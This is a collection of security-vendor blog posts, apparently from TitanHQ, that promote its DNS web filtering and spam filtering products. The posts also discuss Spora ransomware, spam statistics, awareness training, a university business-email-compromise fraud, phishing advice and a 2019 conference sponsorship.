Emisoft Internet experts who have analyzed Spora ransomware say it is far from a run of the mill variant that has been quickly thrown together. It is the work of a highly knowledgeable group. The encryption process contains no weaknesses – uncommon for a new ransomware variant – the design of the HTML ransom demand and the payment portal is highly sophisticated, and the payment portal also contains a chat option to allow communication with the hackers. This degree of professionalism only comes from a lot of investment and massive work. This threat is unlikely to disappear soon. In fact, it could prove to be one of the most serious threats in 2017 and into the future.
DNS based web filtering takes advantage of cloud based technology to provide an Internet content filtering service equally as powerful as hardware or software solutions, but without the capital investment and high maintenance costs of those. As with most cloud-based technologies, DNS based web filtering software is handy and reliable, and extremely scalable.
Any Internet filtering solution has to have SSL inspection so that it can examine the content of encrypted web pages. Whereas SSL inspection can drain CPU resources and memory when included in hardware and software solutions, with DNS based web filtering the inspection process is done in the cloud – thus enhancing network operations.
How DNS Based Web Filtering Operates
In order to filter Internet content using a Domain Name Server (DNS), you need to register for a web filtering service. The service provider gives you a browser-based account you log into, submit your external IP address and set your web filtering policy. Then you just redirect your DNS system settings to the service provider´s web filtering service.
If you have a range of web filtering policies for different positions within your company, tools are available to link management tools such as LDAP and Active Directory with the web filtering service. It is also possible to put in place a DNS proxy for per user reporting and select from a variety of predefined reports. Alternatively, it is a simple process to set up your own bespoke reports.
Due to the way in which DNS based web filtering works, it can be applied with every type of network and operating system. Multiple locations and domains can be managed from one management portal, and – due to the SSL inspection process being conducted in the cloud – end users will not suffer the latency usually associated with hardware and software solutions.
Highly Granular Controls Maximize Your Security Strength
The most common given reasons given for adding an Internet content filter are to safeguard the company from web-borne dangers and to enforce acceptable use policies. DNS based web filtering achieves both these aims by deploying a three-tier mechanism for filtering Internet content. The three tiers work in tandem to maximize the company´s defenses and prevent users accessing material that could be an obstruction to productivity or cause offense.
The first tier includes SURBL and URIBL filters. These are commonly referred to as blacklists and they compare each request to view a website against IP addresses from which malware downloads, phishing attacks and spam emails are known to have been initiated. When matches are located, the request to visit the website is denied. Blacklists are given and updated by your service provider.
Behind the blacklists, category filters and keyword filters make up the second and third lines of defense. These can be applied by system administrators to stop users visiting websites within some categories (social networking for example), or those likely to include material that would be inappropriate for an office environment. Keyword filters can also be used to prevent users accessing specific content or web applications, or downloading files with extensions most linked with malware.
Exemptions to general policies can be set up by user or user group if access to a website or web application is required by a certain department within the company. For example, you may not want your employees to engage in personal Internet banking during working hours, but it is likely crucial for your finance department has access to online banking services. Similar exemptions could be established (say) if your marketing department needed access to the company´s Facebook or Twitter accounts.
DNS Based Web Filtering Provided by SpamTitan
SpamTitan offers businesses a range of DNS based web filtering solutions – WebTitan Cloud for companies with fixed networks, and WebTitan Cloud for WiFi for companies providing a wireless service to end users. Both DNS based web filtering solutions have been created with maximum ease of use, maximum granularity and maximum security from web-borne threats.
Along with being versatile and effective DNS based web filtering solutions, both WebTitan Cloud and WebTitan Cloud for WiFi include many features to safeguard your company. Both solutions have best-in-class malicious URL detection, phishing protection and antivirus software – all of which is updated automatically. Both also update our filtering mechanisms in actual time – including the categorization of new websites as they are released.
The service grows in line with your company, so you never have to worry about registering new users or even multiple networks. WebTitan Cloud and WebTitan Cloud for WiFi are infinitely scalable, with no bandwidth limits, and no latency problems. Unless you advise them, your users will never know they are being safeguarded from web-borne threats until they try to visit an unsafe or inappropriate web pagesite.
Although many reports seem to indicate that email spam is dropping, email spam and botnet infection is still a major danger for most U.S organizations and people – with criminal practices netting hacking gangs billions of dollars every year.
Estimating the infection levels and the amount of spam being sent was one of the chief aims of the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG). M3AAWG, is a global network tasked with promoting cybersecurity best practices and tackling organized internet crime. M3AAWG was created 10 years ago by a number of leading internet service providers, with the goal of enhancing collaboration and sharing knowledge to make it more complicated for criminals to spam account users. By reducing the impact of email spam on individuals and organizations, ISPs would be able to better secure users, IPS’s email platforms and their reputations.
It was noticed that quantifying email spam and botnet infection levels was an extremely difficult task; one that was only possible with collaboration between internet service suppliers. Arising out of this collaboration, the organization has produced reports on the global state of email spam and botnet infection. Its latest analysis suggests that approximately 1% of computer users are part of a botnet network.
The data gathered by M3AAWG involved assessing 43 million email subscribers in the United States and Europe.,The data analysis showed that IPS’s normally block from 94% to 99% of spam emails. The company’s report suggests that overall, IPS’s do a good job of blocking email spam.
The figures look good but, taking into account the huge scale of email spam, billions of spam emails are still making it through to users, with financial organizations and other companies now being regularly focused on with spam and malware.
Email spammers are well backed financially, and criminal organizations are using email spam as a means of getting hold of tens of billions of dollars annually from internet fraud. Spam emails are sent to phish for sensitive information, such as bank account information, credit card details and other highly sensitive data including Social Security numbers. Accounts can be cleaned out, credit cards maxed out and data used to carry outt identity theft; racking up tens of thousands of dollars of debts in the victims’ names.
In previous years, email spammers were dedicate to sending emails randomly to accounts with offers of cheap Rolexes, Viagra, potential brides and the opportunity to claim an inheritance from a long lost relative. Currently, spammers have realized there are far greater rewards to be gained, and emails are now sent containing links to malware-infected websites which can be used to gain access to users’ PCs, laptops and Smartphones, gaining access to highly sensitive data or locking devices and seeking ransoms.
Some emails may still be shared manually, but the majority are sent via botnets. Networks of infected machines that can be used to send huge volumes of spam emails, spread malware or organize increasingly complex attacks on individuals and organizations. The botnets are available via rental, with criminals able to rent botnet time and use them for any number of taks.
A large number of attacks are now coming from countries where there is little regulation and a very low risk of the perpetrators being caught. Africa states, as well as Indonesia and the Ukraine house huge volumes of scammers. They have even established call centers to deal with the huge amount of enquiries from criminals seeking botnet time to carry out phishing and spamming campaigns. Tackling the issue at the source is difficult, with corruption rife in the countries where the perpetrators live.
However, it is possible to lower spam level, and the danger of staff members being tricked by a scam or downloading malware by installing a robust email spam filter, reducing the potential for spam emails and phishing campaigns getting through to individual accounts. A report from Verizon showed that 23% of users view phishing emails and 11% open attachments and visit links included. Making sure that the emails reaching users is therefore one of the most successful methods of defense against these attacks.
Due to the ever evolving and more intricate nature of hacking, spamming and activity of cyber criminals, it is now vital that all companies, groups and organizations have an effective security awareness program and to make sure all employees, staff and workers know how to recognize email threats.
Threat actors are now creating very sophisticated tactics to download malware, ransomware, and obtain login credentials and email is the attack style of choice. Companies are being targeted and it will only be a matter of time before a malicious email is delivered to an worker’s inbox. It is therefore crucial that employees are trained how to identify email threats and told how they should respond when a suspicious email lands in their inbox.
If security awareness training is not made available for staff then there will be a huge hole in your security defenses. To assist yo in getting back on the right track, we have listed some vital elements of an effective security awareness strategy.
Vital Important Elements of an Strong Security Awareness Program
Have C-Suite Involved
One of the most vital starting points is to see to it that the C-Suite is on board. With board involvement you are likely to be able to dedicate larger budgets for your security training program and it should be simpler to get your plan adapted and followed by all departments in your organization.
In practice, getting the backing of executives to support a security awareness program can tricky. One of the most effective ways to increase the chance of success is to clearly explain the importance of developing a security culture and to back this up with the financial advantages that come from having a strong security awareness program. Provide data on the extent that businesses are being hit, the volume of phishing and malicious emails being shared, and the money that other businesses have had to cover to address email-based attacks.
The Ponemon Institute has completed several major surveys and provides annual reports on the expense of cyberattacks and data breaches and is a good source for facts and figures. Security awareness training companies are also good sources of figures. Current data indicates the benefit of the program and what you require to ensure it is a success.
Get Other Departments On Board
The IT department should not be the only one responsible for developing a strong security awareness training program. Other departments can supply help and may be able to offer additional materials. Try to get the marketing department to support this, human resources, the compliance department, privacy officers. Those outside of the security team may have some valuable input not only in terms of content but also how to provide the training to get the best results.
Create a Continuous Security Awareness Strategy
A one-time classroom-based training session conducted once annually may have once been enough, but due to the rapidly changing threat landscape and the volume of phishing emails now being sent, an annual training session is no longer adequate.
Training should be conducted an ongoing process provided during the year, with up to date information included on present and emerging threats. Each employee is different, and while classroom-based training sessions work for some, they do not work for all employees. Create a training program using a variety of training methods including annual classroom-based training sessions, constant computer-based training sessions, and use posters, games, newsletters, and email alerts to keep security issues to the fore of workers’ minds.
Provide Incentives and Gamification
Reward individuals who have finished training, alerted the group to a new phishing threat, or have scored well in security awareness training and tests. Try to establish competition between departments by publishing details of departments that have performed very well and have the highest percentage of employees who have finished training, have reported the most phishing threats, scored the highest in tests, or have correctly identified the most phishing emails in a round of phishing simulations.
Security awareness training should ideally be interesting. If the training is fun, employees are more likely to want to participate and retain knowledge. Use gamification methods and choose security awareness training providers that offer interesting and engaging content.
Test Knowledge with Phishing Email Simulations
You can conduct training, but unless you test your employees’ security awareness you will not know how effective your training program has been and if your staff have been paying attention.
Before you begin your training program it is important to have a baseline against which you can gauge success. This can be achieved using security questionnaires and completing phishing simulation exercises.
Running phishing simulation exercises using real world examples of phishing emails following training has been completed will highlight which employees are security titans and which need further training. A failed phishing simulation exercise can be transformed into a training opportunity.
Comparing the before and after results will let you see the advantages of your program and could be used to help get more funding.
Train your staff constantly and review their understanding and in a relatively short space of time you can create a highly effective human firewall that complements your technological cyber security security measures. If a malicious email breaks through your spam filter, you can be happy that your employees will have the skills to recognize the threat.
An enterprise web filtering solution must provide a robust defense against web-borne threats along with being flexible in order to meet the requirements of the enterprise. However, flexibility without ease-of-use can result in the solution being useless. If enterprise web filtering software is difficult to configure, filtering parameters may either be set too high – obstructing workflows – or set too low, allowing a gateway for hackers.
At SpamTitan, we are conscious of the possible issues related to enterprise web filtering, and we have developed a range of flexible and easy-to-use enterprise Internet filtering solutions that can be set up and in minutes, that have no upfront costs, and that have low maintenance overheads – releasing IT resources to focus on other important problems. We also provide guidance on how to optimize filtering parameters.
In order to maximize the flexibility of our enterprise web filtering software, we deploy a three-tier filtering mechanism and whitelists to allow access to websites that may otherwise be restricted and to reduce the strain on CPU resources when the solution is reviewing encrypted websites. The three tiers consist of URIBL/SURBL filters, category filters and keyword filters:
URIBL/SURBL filters manages requests to visit websites against blacklists of websites known to be harboring malware or who mask their true identities behind proxy servers. They also review for any IP addresses associated with phishing attacks and block access if a match is discovered.
Our category filters sort more than six billion web pages into fifty-three different categories (abortion, adult entertainment, alternative beliefs, alcohol, etc.). Network Administrators can block access to any of the categories with the click of a mouse via the centralized management portal.
Keyword filters restrict access to websites containing specific words, using specific apps, or inviting installations with specific file extensions. This third tier of our enterprise web filtering software supplies a high level of granularity to prevent workflow obstruction or gateways for hackers.
All the filtering parameters are subject to user policies, which can be established and managed by individual user, user group or enterprise-wide. For ease of use, our enterprise Internet filtering solution can be integrated with Active Directory and LDAP, and allows for many different administrative roles to be created for network managers, policy managers, and reporting managers.
SpamTitan’s variety of flexible and simple-to-use enterprise Internet filtering solutions consist of WebTitan Gateway, WebTitan Cloud, and WebTitan Cloud for WiFi. Each can be deployed within minutes and each has automatic network configuration.
WebTitan Gateway is a virtual appliance that is downloaded behind the firewall and can be run as an ISO directly on existing hardware or a virtual infrastructure. It can be used on most operating systems, scalable to thousands of users and supports both HTTP and HTTPS web filtering.
WebTitan Cloud takes advantage of cloud-based technology to send an unmatched combination of coverage, accuracy and flexibility with imperceptible latency. Deployment only needs a quick redirection of the enterprise´s DNS to our servers.
WebTitan Cloud for WiFi has been specifically created to supports both static and dynamic IP addresses. It keeps wireless networks, single WiFi access points and nationwide networks of WiFi hotspots safe from web-borne threats with the same flexibility and ease of use.
All of our enterprise Internet filtering solutions provide actual-time oversight of network web activity and a suite of reporting options that can be set up to provide deep insight into activity by user, user group, URL or IP address and identify trends or policy violations. Network Administrators can also set up email alerts to notify of any attempts to circumnavigate the enterprise web filtering software.
If your interest in enterprise Internet filtering solutions is a result of you being a Managed Service Provider (MSP) or reseller, you will appreciate that flexibility and ease-of-use is of paramount importance when supplying an enterprise Internet filtering service to clients. The option of managing the solution yourself, or delegating responsibility to each of your clients, may also be of interest to you.
However, some of the biggest benefits of providing our WebTitan service to your clients are that all three WebTitan solutions are multi-tenanted enterprise Internet filtering solutions, they can be provided in white label format for re-branding, and we offer a range of hosting options – in our infrastructure, in your infrastructure, or in a private cloud for each client via AWS. Please speak with us for more information about our services for MSPs.
If you would like to discover more about our flexible enterprise web filtering software, do not hesitate to contact us and talk about your requirements with one of our Sales Technicians. The discussion will help decide the most appropriate enterprise Internet filtering solution for your circumstances, after which you will be asked to take advantage of a thirty day free trial.
During the trial period, you will be supported by our industry-leading Customer and Technical Support experts. They will provide advice about optimizing the filtering parameters, and take you through fine-tuning the enterprise web filtering software to achieve optimum effectiveness. Then, at the end of the free trial, if you choose to continue with our service, no further configuration will be rnecessary.
We are happy that you will find our enterprise web filtering software a strong defense against web-borne threats, flexible and easy-to-use. Contact us today to begin your free trial and you could be evaluating the merits of our enterprise Internet filtering solutions in your own environment quickly.
In too many cases, news of data breaches comes with details of the failures in network security that allowed a hacker access to confidential data. Many of these failure are preventable with adequate precautions such as a spam email filter and mechanism for managing access to the Internet.
Almost as many breaches in network security can be blamed on poor employee training. Password sharing, unauthorized installations and poor online security practices can result in hackers gaining easy access to a network and extracting confidential data when they wish to.
It has been well reported that hackers will bypass groups with strong network security and turn their attention to fish that are simpler to catch. Make sure your group does not get caught in the net – set upappropriate web filters and educate your staff on the importance of network security.
A Southern Oregon University phishing attack has demonstrated exactly why so many hackers have opted for phishing as their main source of profits.
The Southern Oregon University phishing attack involved just one phishing email. The attackers pretended to be a construction company – Andersen Construction – that was erecting a pavilion and student recreation center at the University.
The attackers spoofed the email address of the construction firm and asked for all future payments be directed to a separate bank account. The university then transferred the next payment of €1.9m to the new account in April.
The university saw that the construction firm had not received the funds three days later. The FBI was made aware of the situation as soon as the fraud was discovered and efforts are continuing to recover the funds. The university reports that the hackers have not withdrawn all of the funds from their account, although a sizeable chunk cannot be located. Joe Mosley, a representative for SOU said, “It’s certainly not all of the money that was transferred, but it’s not just nickels and dimes, either.”
In order for a scam like this to be successful, the hackers would need to be aware that the construction project was taking place and the name of the firm. Such data is not hard to find and universities often have construction projects operational.
These attacks are referred to as Business Email Compromise (BEC) scams. They typically involve a contractor’s email account being hacked and used to send an email to a vendor. It is not known whether the vendors email account had been hacked, but that step may not be necessary to pull off a phishing attack such as this.
Increase in BEC Attacks Prompts FBI Alert for Universities
In this instance, the payment was massive but it is far from an isolated incident. Last month, the FBI published a public service announcement warning universities of attacks such as this.
The FBI warned that access to a construction firm’s email account is not required. All that is required is for the scammer to buy a similar domain to the one used by the firm. Accounts department employees may check the email address and not notice that there is a letter changed.
By the time the university saw that a payment has not been sent, the funds have already been removed from the scammer’s account and cannot be recovered. Payments are often of the order of several hundred thousand dollars.
The FBI advised SOU that there have been 78 such attacks in the past 12 months, some of which have been carried out on universities. However, all groups are in danger from these BEC scams.
The Southern Oregon University phishing attack shows just how simple it can be for cybercriminals to pull off a BEC attack. Securing against this time of scam requires employees to be vigilant and to use extreme caution when requests are made to alter bank accounts. Such a request should always be verified by some means other than email. A telephone call to the construction firm could easily have prevented this scam before any transfer was completed.
Despite the high profile given to Internet privacy on mainstream media, there still appears to be naivety among certain Internet users about keeping their personal details safe. Thousands of data breaches impacting millions of people are reported every year, yet one still comes across the same stories about Internet users having the same passwords for a range of different sites.
Whether a password is in place for a social media account, an online shopping site or an online banking portal, it should be a) unique, b) hard to guess, and c) changed often. To manage your Internet privacy, only ever give the minimum amount of information required and only if you have complete confidence in the website you are giving it to.
Social media can be a key factor of a group’s marketing operations – it can also be the gateway for many online threats. Internet users who choose not to use unique passwords for their online activities, share their passwords, or willingly provide confidential information without due consideration for the security implications can be risking the online security of an entire group.
Instead of an employee threaten the integrity of your group’s online security, it is in your best interests to implement an Internet filtering solution from TitanHQ. An Internet filtering solution – and proper training about the risks of communicating confidential data online – can address the risk of your organization´s online defenses being compromised by an staff member’s carelessness or naivety.
Phishing and email spam is thought to cost businesses over $1 billion each year, and hackers are becoming more complex in the campaigns they launch to try to steal confidential data or passwords from innocent Internet users.
Part of the reason why phishing and email spam still work is the language used within the communication. The message to “Act Now” because an account seems to have been impacted, or because a colleague seems to need urgent support, often causes people to act before they think.
Even experienced security consultants have been caught by phishing and email spam, and the advice provided to every Internet user is:
If you do not know whether an email request is legitimate, try to verify it by contacting the sender independently of the information given in the email.
Never handover confidential data or passwords requested in an email or on a web page you have arrived at after clicking on a link in an email.
Turn on spam filters on your email, keep your anti-virus software up-to-date and turn on two-step authentication on all your accounts whenever you can.
Always use different passwords for separate accounts, and amend them frequently to stop being a victim of keylogging malware downloads.
Remember that phishing and email spam is not restricted to email. Watch out for scams sent through social media channels.
Phishing in particular has become a popular attack vector for hackers. Although phishing goes back to the first days of AOL, there has been a tenfold increase in phishing campaigns over the past 10 years reported to the Anti-Phishing Working Group (APWG).
Phishing is an extension of spam mail and can focus on small groups of people (spear phishing) or target executive-level management (whale phishing) in order to gather data or obtain access to computer systems.
The best way to safeguard yourself from phishing and email spam is to use the advice provided above and – most importantly – enable a reputable spam filter to block possibly unsafe emails from being sent to your inbox.
The main focus of our spam advice section is to keep you informed with the latest news on new email spam campaigns, email-based threats and anti-spam solutions that can be deployed to prevent those threats.
Email spam is more than an annoyance. Even if the amount of spam emails received by employees is relatively small, it can be a major drain on productivity, especially for groups with hundreds or thousands of employees. This section includes articles offering advice on how to reclaim those lost hours by cutting the number of messages that are delivered to your employees’ inboxes.
However, much worse than the lost hours are the malware and ransomware threats that arrive through spam email. Email is now the number one attack vector used by hackers to deliver malware and ransomware. Hackers are now using increasingly sophisticated methods to get around security solutions. Today’s spam emails use advanced social engineering tactics to trick end users into revealing login details and other sensitive information, and installing malicious software on their computers.
Major advances have also been made to malware and ransomware. Self-replicating worms are being used to infiltrate entire networks before ransomware attacks take place, maximizing the damage caused and the ransom payments that can be generated. The cost to industry is significant. In 2018 ransomware attacks resulted in $1 billion in losses by companies, with 2017 expected to see those losses increase to a staggering $4 billion. Blocking spam email messages from being sent is therefore an essential element of any cybersecurity policy.
Good spam advice can help groups take action promptly to reduce the danger of email-based attacks.
TitanHQ is excited to announce it will be a sponsor of the upcoming DattoCon19 MSP conference in San Diego on June 17-19.
The three-day conference is the premier event for managed service providers in the United States. Industry-leading MSPs, industry experts, and vendors will be holding sessions where MSPs can gain valuable insights into the business, learn best practices for maximizing profits and boosting sales growth, and discover the myriad of opportunities to boost monthly recurring revenue (MRR). Training will be offered on Datto solutions and vendors will be on hand to answer questions and solve MSP problems.
The focus on improving business impact growth and profitability, learning sessions, and networking opportunities greatly benefit MSPs. On average, DattoCon attendees achieve an increase of 41% year-over-year growth in MMR compared to those that failed to attend the conference.
TitanHQ will be on hand to provide MSPs with information on three cloud-based MSP solutions:
DattoCon19 attendees are encouraged to visit TitanHQ at booth 23 at the conference to:
Learn about TitanShield, TitanHQ’s exclusive partner program for MSPs
Find out about the TitanHQ technology that provides the web security layer for Datto D200 and DNA boxes
Discover TitanHQ solutions for MSPs
SpamTitan Cloud – Spam filter offering phishing and malware protection
WebTitan Cloud – DNS Filter for content control and protection from web-based attacks
ArcTitan – Email archiving for compliance
Find out how to better protect Office 365 from email-based attacks
Discover the considerable benefits switching from Cisco Umbrella to WebTitan
Benefit from DattoCon19 show pricing
TitanHQ will also be running a daily raffle to win a bottle of vintage Irish whiskey and will be co-hosting two parties at DattoCon19: GasLamp District Takeovers on Monday 6/17 and Wednesday 6/19.
Rocco Donnino, Executive Vice President-Strategic Alliances, TitanHQ will be a panel member at the Datto Select Avendors!! Event on Monday June 17, between 3PM and 5PM.
This new event aims to solve some of the most pressing MSP problems with a panel of experts on hand to offer potential solutions.
TitanHQ Vintage Whiskey Raffle Winners
DattoCon19 will be taking place in San Diego, California on June 17-19, 2019
If you are not yet registered for the event you can do so here.